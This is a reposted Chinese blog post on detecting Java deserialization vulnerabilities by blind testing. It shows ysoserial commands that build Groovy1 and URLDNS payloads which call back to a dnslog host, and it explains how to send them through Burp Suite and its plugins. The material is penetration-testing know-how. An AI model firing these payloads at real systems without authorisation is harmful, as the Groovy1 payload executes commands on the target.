碼上快樂

相關內容    簡體    繁體

java反序列化盲打與手工測試

本文轉載自   查看原文   2020-01-10 12:06   294 

1.生成測試payload:

cd D:\plug_in\BurpSuite JAVA反序列化漏洞掃描插件

//下面的語句意思就是反連到你自已的dnslog平台:

java -jar ./ysoserial-0.0.5.jar Groovy1 "ping t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org" > payload1.txt

 

java -jar ./ysoserial-0.0.6-SNAPSHOT-BETA-all.jar URLDNS http://t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org/ > payload1.txt

 

 

2.burpsuite中載入paload1.txt:

Repeater->右鍵選“Paste from file"

   

//dnslog平台上面看結果:

 3.burpsuite反序列化插件的測試截圖:

下載地址:https://github.com/federicodotta/Java-Deserialization-Scanner/

 

4、burpsuite JavaSerialKiller插件測試java反序列化漏洞:

 

 

  

ping t00ls.321c7f33a1e05e08674e86fae641e95c.tu4.org 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Java反序列化測試 CSRF手工測試方法 Java反序列化 自動化測試07 - TPshop測試項目(手工測試) Java對象的序列化與反序列化 Java 對象序列化和反序列化 Java序列化與反序列化 Java序列化與反序列化 java對象的序列化與反序列化 java之序列化與反序列化
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM